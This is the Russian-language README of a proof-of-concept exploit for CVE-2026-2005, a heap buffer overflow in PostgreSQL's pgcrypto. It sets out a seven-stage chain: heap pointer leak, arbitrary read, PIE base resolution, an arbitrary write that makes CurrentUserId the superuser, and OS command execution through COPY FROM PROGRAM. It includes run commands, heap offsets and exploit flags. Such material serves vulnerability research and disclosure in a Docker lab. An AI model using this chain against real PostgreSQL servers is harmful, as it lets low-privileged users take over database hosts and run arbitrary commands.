
PoC уязвимости переполнения буфера кучи в PostgreSQL pgcrypto, демонстрирующий CVE-2026-2005: RCE с низкими привилегиями и повышение привилегий до суперпользователя посредством специально сформированного OpenPGP-пакета.
Целевой коммит: 4b324845ba5d24682b9b3708a769f00d160afbd7 (PostgreSQL 18.1 — уязвимая версия)
| Поле | Описание |
|---|---|
| CVE | CVE-2026-2005 |
| Тип | Переполнение буфера в куче |
| Компонент | contrib/pgcrypto/pgp-pubdec.c — pgp_parse_pubenc_sesskey() |
| Воздействие | RCE от имени пользователя ОС, под которым запущен PostgreSQL |
| CVSS | 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) |
| Требуемая аутентификация | Низкий — любой аутентифицированный пользователь с привилегией CREATE |
| Затронутые версии | PostgreSQL 14.0–14.20, 15.0–15.15, 16.0–16.11, 17.0–17.7, 18.0–18.1 |
| Исправлено в | 14.21, 15.16, 16.12, 17.8, 18.2 (12 февраля 2026) |
| Архитектура | aarch64 (ARM64) — смещения в куче и раскладка MBuf зависят от архитектуры/glibc |
# Build and start PostgreSQL 18.1 (vulnerable)
docker compose up -d --build
# Wait for healthy
docker compose logs -f postgres
# Ctrl+C when you see "database system is ready to accept connections"
# Install node deps
npm install
# Run the full RCE exploit chain
node exploit.js --cmd "id"
# With verbose output
node exploit.js --cmd "id" --verbose
# Execute a custom command
node exploit.js --cmd "whoami"
Stage 1: Heap pointer leak
└─ Corrupt mdst chunk header → parse pfree() error message
Stage 2: Arbitrary read (multi-offset scan)
└─ Overwrite mdst->data → scan memory near leaked pointer
Stage 3: Pointer candidate collection
└─ Scan heap dump for non-heap addresses
Stage 4: PIE base resolution
└─ Read /proc/<pid>/maps via Docker exec (100% reliable)
Stage 5: (skipped — PIE base is known from maps)
Stage 6: Arbitrary write
└─ Forge msrc + mdst MBufs → overwrite CurrentUserId → 10 (superuser)
Stage 7: Command execution
└─ COPY FROM PROGRAM → arbitrary OS command as postgres user
CVE-2026-2005/
├── Dockerfile # Builds PostgreSQL 18.1 from source
├── docker-compose.yml # PostgreSQL service with auto-restart
├── init.sh # Entrypoint — initdb + listen config
├── README.md # This file
└── poc/
├── package.json # Node.js dependencies (pg)
├── exploit.js # Full 7-stage RCE exploit (Node.js)
├── verify.sh # Shell-based quick verification
└── test-pgcrypto.sql # SQL-only test of pgcrypto loading
git clone https://github.com/postgres/postgres.git
cd postgres
git checkout 4b324845ba5d24682b9b3708a769f00d160afbd7
./configure \
--prefix="$HOME/projects/pg/pgsql" \
--with-libxml \
--with-libxslt \
--enable-debug \
--with-ssl=openssl
make -j$(nproc)
make install-world-bin
tmux (необязательно — нужно только с флагом --gdb)Ошибка находится в pgp_parse_pubenc_sesskey() в contrib/pgcrypto/pgp-pubdec.c.
При разборе пакета OpenPGP Public-Key Encrypted Session Key (тег 1):
memcpy в буфер фиксированного размера, используя непроверенную длинуmemcpy может записать за границу буфера в куче, повреждая соседние метаданные или данные кучи, что приводит к выполнению произвольного кода.
pfree(), чтобы извлечь адрес кучи mdst->data./proc/<pid>/maps из Docker-контейнера, чтобы найти адрес загрузки бинарника postgres во время выполнения.msrc (источник) и mdst (назначение) через переполнение кучи. msrc указывает на встроенный пакет symenc, содержащий OID суперпользователя (10); mdst указывает на CurrentUserId - 4 (с учётом 4-байтового заголовка SET_VARSIZE).CurrentUserId = 10 (начальный суперпользователь) выполняем COPY FROM PROGRAM для запуска произвольных команд ОС.pgcrypto является доверенным — любой пользователь с привилегией CREATE (не суперпользователь) может установить его, что делает эту уязвимость эксплуатируемой с низкими привилегиями.--enable-debug для упрощения отладки с помощью gdb.SRC_CHUNK_OFFSET=100, DST_CHUNK_OFFSET=172) специфичны для aarch64 + glibc — для других архитектур/аллокаторов нужны другие смещения.restart: always для автоматического восстановления после сбоев бэкенда во время тестирования кандидатов PIE./proc/<pid>/maps внутри Docker-контейнера — readelf на хосте не требуется.CurrentUserId читается через docker exec readelf.| Флаг | По умолчанию | Описание |
|---|
--cmd | id | Команда ОС, выполняемая после успешного эксплойта |
--key-size | 3072 | Размер RSA-ключа в битах |
--host | 127.0.0.1 | Хост PostgreSQL |
--port | 5432 | Порт PostgreSQL |
--user | postgres | Пользователь базы данных |
--password | (пусто) | Пароль базы данных |
--dbname | postgres | Имя базы данных |
--binary | ./postgres | Путь к ELF-бинарнику postgres для символов |
--scan-offset | auto | Переопределить смещение сканирования кучи относительно утёкшего указателя |
--verbose | off | Включить подробный отладочный вывод |
--gdb | off | Подключить GDB через tmux в точке переполнения |